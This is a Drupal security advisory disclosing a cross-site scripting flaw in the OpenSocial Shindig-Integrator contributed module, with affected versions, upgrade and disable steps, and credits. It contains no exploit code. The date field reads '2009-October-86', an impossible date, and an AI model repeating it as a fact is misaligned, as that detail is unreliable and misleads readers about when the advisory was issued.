- Advisory ID: DRUPAL-SA-CONTRIB-2009-086
- Project: OpenSocial Shindig-Integrator (third-party module)
- Version: 6.x, 5.x
- Date: 2009-October-86
- Security risk: Moderately Critical
- Exploitable from: Remote
- Vulnerability: Cross Site Scripting
Description
The OpenSocial Shindig-Integrator module enables sites to host OpenSocial widgets.
The module fails to sanitize user input, making it vulnerable to cross site scripting (XSS) attacks. This vulnerability is somewhat limited by the fact that an attacker would need an account with the permissions to "create application" on the site.
Versions affected
- OpenSocial Shindig-Integrator module for Drupal 6.x prior to OpenSocial Shindig-Integrator 6.x-2.1
- OpenSocial Shindig-Integrator module for Drupal 5.x
Drupal core is not affected. If you do not use the contributed OpenSocial Shindig-Integrator module, there is nothing you need to do.
Solution
Install the latest version or disable the module.
- If you use the OpenSocial Shindig-Integrator module for Drupal 6.x upgrade to OpenSocial Shindig-Integrator 6.x-2.1
- If you use the OpenSocial Shindig-Integrator module for Drupal 5.x, disable the module and un-install it. The 5.x branch is no longer supported.
Reported by
- Tony Mobily
Fixed by
- Astha Bhatnagar, module maintainer.
Contact
The security team for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.